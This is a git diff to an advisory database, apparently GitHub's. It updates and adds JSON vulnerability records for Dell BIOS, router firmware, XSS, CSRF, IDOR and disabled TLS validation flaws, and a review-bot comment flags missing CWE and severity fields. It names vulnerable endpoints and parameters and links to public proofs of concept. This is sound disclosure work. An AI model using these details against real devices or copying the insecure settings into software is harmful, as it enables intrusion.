 create mode 100644 advisories/unreviewed/2026/02/GHSA-9hjg-4h75-mvc5/GHSA-9hjg-4h75-mvc5.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-h2mx-ppvp-v2rq/GHSA-h2mx-ppvp-v2rq.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-jqx8-f6x9-hm34/GHSA-jqx8-f6x9-hm34.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-m575-4pr9-x5xr/GHSA-m575-4pr9-x5xr.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-mv94-7vf6-c5q6/GHSA-mv94-7vf6-c5q6.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-p76h-f4cx-3273/GHSA-p76h-f4cx-3273.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-pj4q-4jcg-hp2c/GHSA-pj4q-4jcg-hp2c.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-q4hc-vp2m-fr47/GHSA-q4hc-vp2m-fr47.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-q6w4-grhv-wcp8/GHSA-q6w4-grhv-wcp8.json
 create mode 100644 advisories/unreviewed/2026/02/GHSA-vm54-j482-hx4h/GHSA-vm54-j482-hx4h.json
diff --git a/advisories/unreviewed/2022/01/GHSA-9vr7-rp6q-4v56/GHSA-9vr7-rp6q-4v56.json b/advisories/unreviewed/2022/01/GHSA-9vr7-rp6q-4v56/GHSA-9vr7-rp6q-4v56.json
index 195ea2ddf6c72..37015299f14a6 100644
--- a/advisories/unreviewed/2022/01/GHSA-9vr7-rp6q-4v56/GHSA-9vr7-rp6q-4v56.json
+++ b/advisories/unreviewed/2022/01/GHSA-9vr7-rp6q-4v56/GHSA-9vr7-rp6q-4v56.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-9vr7-rp6q-4v56",
- "modified": "2022-02-05T00:01:29Z",
+ "modified": "2026-02-23T18:31:56Z",
 "published": "2022-01-25T00:00:45Z",
 "aliases": [
 "CVE-2021-36342"
 ],
 "details": "Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -21,6 +26,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
+ "CWE-119",
 "CWE-20"
 ],
 "severity": "HIGH",
diff --git a/advisories/unreviewed/2022/01/GHSA-r5q9-m2x7-ffq7/GHSA-r5q9-m2x7-ffq7.json b/advisories/unreviewed/2022/01/GHSA-r5q9-m2x7-ffq7/GHSA-r5q9-m2x7-ffq7.json
index e77ed777d9267..598d2f819ee33 100644
--- a/advisories/unreviewed/2022/01/GHSA-r5q9-m2x7-ffq7/GHSA-r5q9-m2x7-ffq7.json
+++ b/advisories/unreviewed/2022/01/GHSA-r5q9-m2x7-ffq7/GHSA-r5q9-m2x7-ffq7.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-r5q9-m2x7-ffq7",
- "modified": "2022-02-05T00:01:22Z",
+ "modified": "2026-02-23T18:31:56Z",
 "published": "2022-01-25T00:00:46Z",
 "aliases": [
 "CVE-2021-36343"
 ],
 "details": "Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -21,6 +26,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
+ "CWE-119",
 "CWE-20"
 ],
 "severity": "HIGH",
diff --git a/advisories/unreviewed/2022/05/GHSA-386j-h4xj-j5ph/GHSA-386j-h4xj-j5ph.json b/advisories/unreviewed/2022/05/GHSA-386j-h4xj-j5ph/GHSA-386j-h4xj-j5ph.json
index d1aeb0d42f1af..b1644cfdbc3ba 100644
--- a/advisories/unreviewed/2022/05/GHSA-386j-h4xj-j5ph/GHSA-386j-h4xj-j5ph.json
+++ b/advisories/unreviewed/2022/05/GHSA-386j-h4xj-j5ph/GHSA-386j-h4xj-j5ph.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-386j-h4xj-j5ph",
- "modified": "2023-12-31T21:30:23Z",
+ "modified": "2026-02-23T18:31:49Z",
 "published": "2022-05-24T17:31:00Z",
 "aliases": [
 "CVE-2020-16940"
diff --git a/advisories/unreviewed/2022/05/GHSA-4v5p-6cwv-27q5/GHSA-4v5p-6cwv-27q5.json b/advisories/unreviewed/2022/05/GHSA-4v5p-6cwv-27q5/GHSA-4v5p-6cwv-27q5.json
index adc93158ae170..bf312f19c31b8 100644
--- a/advisories/unreviewed/2022/05/GHSA-4v5p-6cwv-27q5/GHSA-4v5p-6cwv-27q5.json
+++ b/advisories/unreviewed/2022/05/GHSA-4v5p-6cwv-27q5/GHSA-4v5p-6cwv-27q5.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-4v5p-6cwv-27q5",
- "modified": "2023-12-31T21:30:23Z",
+ "modified": "2026-02-23T18:31:50Z",
 "published": "2022-05-24T17:31:01Z",
 "aliases": [
 "CVE-2020-16968"
diff --git a/advisories/unreviewed/2022/05/GHSA-5rqh-7vr7-2xv6/GHSA-5rqh-7vr7-2xv6.json b/advisories/unreviewed/2022/05/GHSA-5rqh-7vr7-2xv6/GHSA-5rqh-7vr7-2xv6.json
index 8a80de278faea..1556c50f0f7a0 100644
--- a/advisories/unreviewed/2022/05/GHSA-5rqh-7vr7-2xv6/GHSA-5rqh-7vr7-2xv6.json
+++ b/advisories/unreviewed/2022/05/GHSA-5rqh-7vr7-2xv6/GHSA-5rqh-7vr7-2xv6.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-5rqh-7vr7-2xv6",
- "modified": "2023-12-31T21:30:23Z",
+ "modified": "2026-02-23T18:31:49Z",
 "published": "2022-05-24T17:30:59Z",
 "aliases": [
 "CVE-2020-16932"
diff --git a/advisories/unreviewed/2022/05/GHSA-5wr3-pfv7-cqv6/GHSA-5wr3-pfv7-cqv6.json b/advisories/unreviewed/2022/05/GHSA-5wr3-pfv7-cqv6/GHSA-5wr3-pfv7-cqv6.json
index 6ba085e4da0bf..b2c9540b211d8 100644
--- a/advisories/unreviewed/2022/05/GHSA-5wr3-pfv7-cqv6/GHSA-5wr3-pfv7-cqv6.json
+++ b/advisories/unreviewed/2022/05/GHSA-5wr3-pfv7-cqv6/GHSA-5wr3-pfv7-cqv6.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-5wr3-pfv7-cqv6",
- "modified": "2022-11-21T18:30:37Z",
+ "modified": "2026-02-23T18:31:50Z",
 "published": "2022-05-24T17:31:00Z",
 "aliases": [
 "CVE-2020-16947"
diff --git a/advisories/unreviewed/2022/05/GHSA-79w3-7qr6-6x7v/GHSA-79w3-7qr6-6x7v.json b/advisories/unreviewed/2022/05/GHSA-79w3-7qr6-6x7v/GHSA-79w3-7qr6-6x7v.json
index cdbccc137282c..407ac4195c31c 100644
--- a/advisories/unreviewed/2022/05/GHSA-79w3-7qr6-6x7v/GHSA-79w3-7qr6-6x7v.json
+++ b/advisories/unreviewed/2022/05/GHSA-79w3-7qr6-6x7v/GHSA-79w3-7qr6-6x7v.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-79w3-7qr6-6x7v",
- "modified": "2023-12-31T21:30:23Z",
+ "modified": "2026-02-23T18:31:48Z",
 "published": "2022-05-24T17:30:57Z",
 "aliases": [
 "CVE-2020-16929"
diff --git a/advisories/unreviewed/2022/05/GHSA-f475-9c64-jrvp/GHSA-f475-9c64-jrvp.json b/advisories/unreviewed/2022/05/GHSA-f475-9c64-jrvp/GHSA-f475-9c64-jrvp.json
index 0460776384b74..874794a18bca2 100644
--- a/advisories/unreviewed/2022/05/GHSA-f475-9c64-jrvp/GHSA-f475-9c64-jrvp.json
+++ b/advisories/unreviewed/2022/05/GHSA-f475-9c64-jrvp/GHSA-f475-9c64-jrvp.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-f475-9c64-jrvp",
- "modified": "2023-12-31T21:30:23Z",
+ "modified": "2026-02-23T18:31:49Z",
 "published": "2022-05-24T17:30:58Z",
 "aliases": [
 "CVE-2020-16930"
diff --git a/advisories/unreviewed/2022/05/GHSA-fh2p-293q-jmxp/GHSA-fh2p-293q-jmxp.json b/advisories/unreviewed/2022/05/GHSA-fh2p-293q-jmxp/GHSA-fh2p-293q-jmxp.json
index 0c64e2e0bd20f..f48ac682f63c7 100644
--- a/advisories/unreviewed/2022/05/GHSA-fh2p-293q-jmxp/GHSA-fh2p-293q-jmxp.json
+++ b/advisories/unreviewed/2022/05/GHSA-fh2p-293q-jmxp/GHSA-fh2p-293q-jmxp.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-fh2p-293q-jmxp",
- "modified": "2023-12-31T21:30:23Z",
+ "modified": "2026-02-23T18:31:49Z",
 "published": "2022-05-24T17:30:59Z",
 "aliases": [
 "CVE-2020-16939"
diff --git a/advisories/unreviewed/2022/05/GHSA-j2mp-wxpv-6jr8/GHSA-j2mp-wxpv-6jr8.json b/advisories/unreviewed/2022/05/GHSA-j2mp-wxpv-6jr8/GHSA-j2mp-wxpv-6jr8.json
index 096f95110de9f..4854e6c8daff3 100644
--- a/advisories/unreviewed/2022/05/GHSA-j2mp-wxpv-6jr8/GHSA-j2mp-wxpv-6jr8.json
+++ b/advisories/unreviewed/2022/05/GHSA-j2mp-wxpv-6jr8/GHSA-j2mp-wxpv-6jr8.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-j2mp-wxpv-6jr8",
- "modified": "2023-12-31T21:30:22Z",
+ "modified": "2026-02-23T18:31:48Z",
 "published": "2022-05-24T17:30:56Z",
 "aliases": [
 "CVE-2020-16915"
diff --git a/advisories/unreviewed/2022/05/GHSA-m2vp-mjvj-xgg7/GHSA-m2vp-mjvj-xgg7.json b/advisories/unreviewed/2022/05/GHSA-m2vp-mjvj-xgg7/GHSA-m2vp-mjvj-xgg7.json
index b070d005bf515..876a7e0822ba4 100644
--- a/advisories/unreviewed/2022/05/GHSA-m2vp-mjvj-xgg7/GHSA-m2vp-mjvj-xgg7.json
+++ b/advisories/unreviewed/2022/05/GHSA-m2vp-mjvj-xgg7/GHSA-m2vp-mjvj-xgg7.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-m2vp-mjvj-xgg7",
- "modified": "2024-01-01T00:30:39Z",
+ "modified": "2026-02-23T18:31:33Z",
 "published": "2022-05-24T17:27:56Z",
 "aliases": [
 "CVE-2020-0997"
diff --git a/advisories/unreviewed/2022/05/GHSA-pmhj-hpgr-f94j/GHSA-pmhj-hpgr-f94j.json b/advisories/unreviewed/2022/05/GHSA-pmhj-hpgr-f94j/GHSA-pmhj-hpgr-f94j.json
index 396903baf63f0..2b5874840c4e7 100644
--- a/advisories/unreviewed/2022/05/GHSA-pmhj-hpgr-f94j/GHSA-pmhj-hpgr-f94j.json
+++ b/advisories/unreviewed/2022/05/GHSA-pmhj-hpgr-f94j/GHSA-pmhj-hpgr-f94j.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-pmhj-hpgr-f94j",
- "modified": "2023-12-31T21:30:24Z",
+ "modified": "2026-02-23T18:31:51Z",
 "published": "2022-05-24T17:30:49Z",
 "aliases": [
 "CVE-2020-1167"
diff --git a/advisories/unreviewed/2022/05/GHSA-q4pw-cw84-2mfm/GHSA-q4pw-cw84-2mfm.json b/advisories/unreviewed/2022/05/GHSA-q4pw-cw84-2mfm/GHSA-q4pw-cw84-2mfm.json
index d6e39fe2fb2a9..e6751526b556a 100644
--- a/advisories/unreviewed/2022/05/GHSA-q4pw-cw84-2mfm/GHSA-q4pw-cw84-2mfm.json
+++ b/advisories/unreviewed/2022/05/GHSA-q4pw-cw84-2mfm/GHSA-q4pw-cw84-2mfm.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-q4pw-cw84-2mfm",
- "modified": "2022-12-07T00:30:24Z",
+ "modified": "2026-02-23T18:31:40Z",
 "published": "2022-05-24T17:28:01Z",
 "aliases": [
 "CVE-2020-1319"
diff --git a/advisories/unreviewed/2022/05/GHSA-w5jh-vr73-453v/GHSA-w5jh-vr73-453v.json b/advisories/unreviewed/2022/05/GHSA-w5jh-vr73-453v/GHSA-w5jh-vr73-453v.json
index 8bb61caea7969..22639418da768 100644
--- a/advisories/unreviewed/2022/05/GHSA-w5jh-vr73-453v/GHSA-w5jh-vr73-453v.json
+++ b/advisories/unreviewed/2022/05/GHSA-w5jh-vr73-453v/GHSA-w5jh-vr73-453v.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-w5jh-vr73-453v",
- "modified": "2023-12-31T21:30:23Z",
+ "modified": "2026-02-23T18:31:49Z",
 "published": "2022-05-24T17:30:58Z",
 "aliases": [
 "CVE-2020-16931"
diff --git a/advisories/unreviewed/2026/01/GHSA-5mc7-p6pj-r3f5/GHSA-5mc7-p6pj-r3f5.json b/advisories/unreviewed/2026/01/GHSA-5mc7-p6pj-r3f5/GHSA-5mc7-p6pj-r3f5.json
index a46c72ac4d3be..8a7cfb791aa93 100644
--- a/advisories/unreviewed/2026/01/GHSA-5mc7-p6pj-r3f5/GHSA-5mc7-p6pj-r3f5.json
+++ b/advisories/unreviewed/2026/01/GHSA-5mc7-p6pj-r3f5/GHSA-5mc7-p6pj-r3f5.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-5mc7-p6pj-r3f5",
- "modified": "2026-02-13T18:31:23Z",
+ "modified": "2026-02-23T18:31:56Z",
 "published": "2026-01-21T00:31:42Z",
 "aliases": [
 "CVE-2026-0865"
@@ -47,6 +47,14 @@
 "type": "WEB",
 "url": "https://github.com/python/cpython/commit/66da7bf6fe7b81e3ecc9c0a25bd47d4616c8d1a6"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/python/cpython/commit/83ecd18779f286d872f68bfce175651e407d9fff"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/python/cpython/commit/bfba660085767f8c2d582134e9d511a85eda04cf"
+ },
 {
 "type": "WEB",
 "url": "https://github.com/python/cpython/commit/e4846a93ac07a8ae9aa18203af0dd13d6e7a6995"
diff --git a/advisories/unreviewed/2026/02/GHSA-38fx-8cr9-9925/GHSA-38fx-8cr9-9925.json b/advisories/unreviewed/2026/02/GHSA-38fx-8cr9-9925/GHSA-38fx-8cr9-9925.json
index cc3933f36feaf..aca210d92d817 100644
--- a/advisories/unreviewed/2026/02/GHSA-38fx-8cr9-9925/GHSA-38fx-8cr9-9925.json
+++ b/advisories/unreviewed/2026/02/GHSA-38fx-8cr9-9925/GHSA-38fx-8cr9-9925.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-38fx-8cr9-9925",
- "modified": "2026-02-20T18:31:39Z",
+ "modified": "2026-02-23T18:31:56Z",
 "published": "2026-02-20T18:31:39Z",
 "aliases": [
 "CVE-2026-27072"
 ],
 "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PixelYourSite PixelYourSite – Your smart PIXEL (TAG) Manager pixelyoursite allows Stored XSS.This issue affects PixelYourSite – Your smart PIXEL (TAG) Manager: from n/a through <= 11.2.0.1.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-79"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-20T16:22:45Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-4jh8-xj74-jhxx/GHSA-4jh8-xj74-jhxx.json b/advisories/unreviewed/2026/02/GHSA-4jh8-xj74-jhxx/GHSA-4jh8-xj74-jhxx.json
new file mode 100644
index 0000000000000..a6a10b698ea63
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-4jh8-xj74-jhxx/GHSA-4jh8-xj74-jhxx.json
@@ -0,0 +1,44 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4jh8-xj74-jhxx",
+ "modified": "2026-02-23T18:32:02Z",
+ "published": "2026-02-23T18:32:02Z",
+ "aliases": [
+ "CVE-2025-70043"
+ ],
+ "details": "An issue pertaining to CWE-295: Improper Certificate Validation was discovered in Ayms node-To master. The application disables TLS/SSL certificate validation by setting 'rejectUnauthorized': false in TLS socket options",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70043"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gist.github.com/zcxlighthouse/33cc4342dfe650664548b4531d16b655"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/Ayms"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/Ayms/node-To"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-295"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T16:29:36Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-4w36-hgqj-cjp2/GHSA-4w36-hgqj-cjp2.json b/advisories/unreviewed/2026/02/GHSA-4w36-hgqj-cjp2/GHSA-4w36-hgqj-cjp2.json
new file mode 100644
index 0000000000000..c257834cedbb0
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-4w36-hgqj-cjp2/GHSA-4w36-hgqj-cjp2.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4w36-hgqj-cjp2",
+ "modified": "2026-02-23T18:32:02Z",
+ "published": "2026-02-23T18:32:02Z",
+ "aliases": [
+ "CVE-2026-3016"
+ ],
+ "details": "A vulnerability was identified in UTT HiPER 810G up to 1.7.7-171114. The affected element is the function strcpy of the file /goform/formP2PLimitConfig. The manipulation of the argument except leads to buffer overflow. Remote exploitation of the attack is possible. The exploit is publicly available and might be used.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3016"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/xhsy0314/CVEReport/blob/main/UTT-2/README.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/xhsy0314/CVEReport/blob/main/UTT-2/README.md#poc"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347376"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347376"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.756249"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-119"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T16:29:38Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-62pw-p3ph-rgh9/GHSA-62pw-p3ph-rgh9.json b/advisories/unreviewed/2026/02/GHSA-62pw-p3ph-rgh9/GHSA-62pw-p3ph-rgh9.json
new file mode 100644
index 0000000000000..6068f41d6106d
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-62pw-p3ph-rgh9/GHSA-62pw-p3ph-rgh9.json
@@ -0,0 +1,44 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-62pw-p3ph-rgh9",
+ "modified": "2026-02-23T18:32:02Z",
+ "published": "2026-02-23T18:32:02Z",
+ "aliases": [
+ "CVE-2026-27512"
+ ],
+ "details": "Shenzhen Tenda F3 Wireless Router firmware V12.01.01.55_multi contains a content-type confusion vulnerability in the administrative interface. Responses omit the X-Content-Type-Options: nosniff header and include attacker-influenced content that can be reflected into the response body. Under affected browser behaviors, MIME sniffing may cause the response to be interpreted as active HTML, enabling script execution in the context of the administrative interface.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27512"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.tendacn.com/product/F3"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.vulncheck.com/advisories/tenda-f3-reflected-script-execution-via-missing-nosniff-header"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T17:23:29Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-663h-2vr3-ghrj/GHSA-663h-2vr3-ghrj.json b/advisories/unreviewed/2026/02/GHSA-663h-2vr3-ghrj/GHSA-663h-2vr3-ghrj.json
new file mode 100644
index 0000000000000..b29c06c367f74
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-663h-2vr3-ghrj/GHSA-663h-2vr3-ghrj.json
@@ -0,0 +1,37 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-663h-2vr3-ghrj",
+ "modified": "2026-02-23T18:32:02Z",
+ "published": "2026-02-23T18:32:02Z",
+ "aliases": [
+ "CVE-2025-70058"
+ ],
+ "details": "An issue pertaining to CWE-295: Improper Certificate Validation was discovered in YMFE yapi v1.12.0. The application disables TLS/SSL certificate validation by setting 'rejectUnauthorized': false in the HTTPS agent configuration for Axios requests",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70058"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gist.github.com/zcxlighthouse/11c53803faf23f607c2787c166e811d4"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/YMFE"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/YMFE/yapi"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T16:29:36Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-6pjc-995p-mh58/GHSA-6pjc-995p-mh58.json b/advisories/unreviewed/2026/02/GHSA-6pjc-995p-mh58/GHSA-6pjc-995p-mh58.json
new file mode 100644
index 0000000000000..c8a980906014f
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-6pjc-995p-mh58/GHSA-6pjc-995p-mh58.json
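Review bot: `cwe_ids` is left empty in the new GHSA-663h-2vr3-ghrj record although its own `details` text names CWE-295, and `severity` is `[]` / `null`, so consumers that filter this feed by CWE or by a severity threshold will not surface it. The sibling records added in this same patch for the same class of flaw (GHSA-4jh8-xj74-jhxx, GHSA-m575-4pr9-x5xr) carry `"cwe_ids": [ "CWE-295" ]`, and the same value would fit here. GHSA-h2mx-ppvp-v2rq has the identical gap, and GHSA-744p-mq95-2m92 describes stored XSS with no CWE where the other XSS records in this patch use `"CWE-79"`. No CVSS vector for these three is visible on the page, so the score is best left to the upstream scoring source rather than guessed.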
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-6pjc-995p-mh58",
+ "modified": "2026-02-23T18:32:02Z",
+ "published": "2026-02-23T18:32:02Z",
+ "aliases": [
+ "CVE-2026-2697"
+ ],
+ "details": "An Indirect Object Reference (IDOR) in Security Center allows an authenticated remote attacker to escalate privileges via the 'owner' parameter.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2697"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.tenable.com/security/tns-2026-07"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-639"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T16:29:37Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-744p-mq95-2m92/GHSA-744p-mq95-2m92.json b/advisories/unreviewed/2026/02/GHSA-744p-mq95-2m92/GHSA-744p-mq95-2m92.json
new file mode 100644
index 0000000000000..091aa4689286b
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-744p-mq95-2m92/GHSA-744p-mq95-2m92.json
@@ -0,0 +1,29 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-744p-mq95-2m92",
+ "modified": "2026-02-23T18:32:02Z",
+ "published": "2026-02-23T18:32:02Z",
+ "aliases": [
+ "CVE-2026-26464"
+ ],
+ "details": "Stored Cross-Site Scripting (XSS) was found in the /admin/edit_user.php page of Society Management System Portal V1.0, which allows remote attackers to inject and store arbitrary JavaScript code that is executed in users' browsers. This vulnerability can be exploited via the name parameter in a POST HTTP request, leading to execution of malicious scripts when the affected content is viewed by other users, including administrators.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26464"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/0xBhushan/Writeups/blob/main/CVE/Kashipara/Society%20Management%20System%20Portal/Stored%20XSS-name.pdf"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T18:25:51Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-9hjg-4h75-mvc5/GHSA-9hjg-4h75-mvc5.json b/advisories/unreviewed/2026/02/GHSA-9hjg-4h75-mvc5/GHSA-9hjg-4h75-mvc5.json
new file mode 100644
index 0000000000000..91a0ceee4c2ea
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-9hjg-4h75-mvc5/GHSA-9hjg-4h75-mvc5.json
@@ -0,0 +1,44 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9hjg-4h75-mvc5",
+ "modified": "2026-02-23T18:32:02Z",
+ "published": "2026-02-23T18:32:02Z",
+ "aliases": [
+ "CVE-2026-27513"
+ ],
+ "details": "Shenzhen Tenda F3 Wireless Router firmware V12.01.01.55_multi contains a cross-site request forgery (CSRF) vulnerability in the web-based administrative interface. The interface does not implement anti-CSRF protections, allowing an attacker to induce an authenticated administrator to submit state-changing requests, which can result in unauthorized configuration changes.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
